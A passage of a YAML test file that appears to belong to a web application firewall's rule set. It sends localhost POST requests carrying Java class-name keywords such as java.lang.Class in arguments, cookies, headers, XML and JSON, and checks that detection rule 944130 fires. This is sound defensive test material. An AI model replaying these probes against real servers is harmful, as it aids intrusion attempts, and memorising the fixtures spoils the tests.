"gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: java.io.PushbackInputStream=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-235 desc: "Request header test includes keyword java.io.PushbackInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: java.io.PushbackInputStream method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-236 desc: "XML attribute value includes keyword java.io.PushbackInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944130\"" - test_title: 944130-237 desc: "XML element value includes keyword java.io.PushbackInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.PushbackInputStream" output: log_contains: "id \"944130\"" - test_title: 944130-238 desc: "Nested XML element value includes keyword java.io.PushbackInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.PushbackInputStream" output: log_contains: "id \"944130\"" - test_title: 944130-239 desc: "Content-Type text/plain includes keyword java.io.PushbackInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=java.io.PushbackInputStream" output: log_contains: "id \"944130\"" - test_title: 944130-240 desc: "Content-Type application/json arg value includes keyword java.io.PushbackInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"java.io.PushbackInputStream\"}" output: log_contains: "id \"944130\"" - test_title: 944130-241 desc: "Content-Type application/json arg name includes keyword java.io.PushbackInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"java.io.PushbackInputStream\": \"test\"}" output: log_contains: "id \"944130\"" - test_title: 944130-242 desc: "Argument test includes keyword java.io.Reader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=java.io.Reader" output: log_contains: "id \"944130\"" - test_title: 944130-243 desc: "Argument name includes keyword java.io.Reader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "java.io.Reader=test" output: log_contains: "id \"944130\"" - test_title: 944130-244 desc: "Cookie test includes keyword java.io.Reader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=java.io.Reader method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-245 desc: "Cookie name includes keyword java.io.Reader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: java.io.Reader=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-246 desc: "Request header test includes keyword java.io.Reader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: java.io.Reader method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-247 desc: "XML attribute value includes keyword java.io.Reader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944130\"" - test_title: 944130-248 desc: "XML element value includes keyword java.io.Reader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.Reader" output: log_contains: "id \"944130\"" - test_title: 944130-249 desc: "Nested XML element value includes keyword java.io.Reader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.Reader" output: log_contains: "id \"944130\"" - test_title: 944130-250 desc: "Content-Type text/plain includes keyword java.io.Reader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=java.io.Reader" output: log_contains: "id \"944130\"" - test_title: 944130-251 desc: "Content-Type application/json arg value includes keyword java.io.Reader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"java.io.Reader\"}" output: log_contains: "id \"944130\"" - test_title: 944130-252 desc: "Content-Type application/json arg name includes keyword java.io.Reader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"java.io.Reader\": \"test\"}" output: log_contains: "id \"944130\"" - test_title: 944130-253 desc: "Argument test includes keyword java.io.StringReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=java.io.StringReader" output: log_contains: "id \"944130\"" - test_title: 944130-254 desc: "Argument name includes keyword java.io.StringReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "java.io.StringReader=test" output: log_contains: "id \"944130\"" - test_title: 944130-255 desc: "Cookie test includes keyword java.io.StringReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=java.io.StringReader method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-256 desc: "Cookie name includes keyword java.io.StringReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: java.io.StringReader=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-257 desc: "Request header test includes keyword java.io.StringReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: java.io.StringReader method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-258 desc: "XML attribute value includes keyword java.io.StringReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944130\"" - test_title: 944130-259 desc: "XML element value includes keyword java.io.StringReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.StringReader" output: log_contains: "id \"944130\"" - test_title: 944130-260 desc: "Nested XML element value includes keyword java.io.StringReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.StringReader" output: log_contains: "id \"944130\"" - test_title: 944130-261 desc: "Content-Type text/plain includes keyword java.io.StringReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=java.io.StringReader" output: log_contains: "id \"944130\"" - test_title: 944130-262 desc: "Content-Type application/json arg value includes keyword java.io.StringReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"java.io.StringReader\"}" output: log_contains: "id \"944130\"" - test_title: 944130-263 desc: "Content-Type application/json arg name includes keyword java.io.StringReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"java.io.StringReader\": \"test\"}" output: log_contains: "id \"944130\"" - test_title: 944130-264 desc: "Argument test includes keyword java.lang.Class" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=java.lang.Class" output: log_contains: "id \"944130\"" - test_title: 944130-265 desc: "Argument name includes keyword java.lang.Class" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "java.lang.Class=test" output: log_contains: "id \"944130\"" - test_title: 944130-266 desc: "Cookie test includes keyword java.lang.Class" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=java.lang.Class method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-267 desc: "Cookie name includes keyword java.lang.Class" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: java.lang.Class=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-268 desc: "Request header test includes keyword java.lang.Class" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: java.lang.Class method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-269 desc: "XML attribute value includes keyword java.lang.Class" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944130\"" - test_title: 944130-270 desc: "XML element value includes keyword java.lang.Class" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.lang.Class" output: log_contains: "id \"944130\"" - test_title: 944130-271 desc: "Nested XML element value includes keyword java.lang.Class" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.lang.Class" output: log_contains: "id \"944130\"" - test_title: 944130-272 desc: "Content-Type text/plain includes keyword java.lang.Class" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=java.lang.Class" output: log_contains: "id \"944130\"" - test_title: 944130-273 desc: "Content-Type application/json arg value includes keyword java.lang.Class" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"java.lang.Class\"}" output: log_contains: "id \"944130\"" - test_title: 944130-274 desc: "Content-Type application/json arg name includes keyword java.lang.Class" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"java.lang.Class\": \"test\"}" output: log_contains: "id \"944130\"" - test_title: 944130-275 desc: "Argument test includes keyword java.lang.Integer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=java.lang.Integer" output: log_contains: "id \"944130\"" - test_title: 944130-276 desc: "Argument name includes keyword java.lang.Integer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "java.lang.Integer=test" output: log_contains: "id \"944130\"" - test_title: 944130-277 desc: "Cookie test includes keyword java.lang.Integer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=java.lang.Integer method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-278 desc: "Cookie name includes keyword java.lang.Integer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: java.lang.Integer=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-279 desc: "Request header test includes keyword java.lang.Integer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: java.lang.Integer method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-280 desc: "XML attribute value includes keyword java.lang.Integer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944130\"" - test_title: 944130-281 desc: "XML element value includes keyword java.lang.Integer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.lang.Integer" output: log_contains: "id \"944130\"" - test_title: 944130-282 desc: "Nested XML element value includes keyword java.lang.Integer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.lang.Integer" output: log_contains: "id \"944130\"" - test_title: 944130-283 desc: "Content-Type text/plain includes keyword java.lang.Integer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=java.lang.Integer" output: log_contains: "id \"944130\"" - test_title: 944130-284 desc: "Content-Type application/json arg value includes keyword java.lang.Integer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: 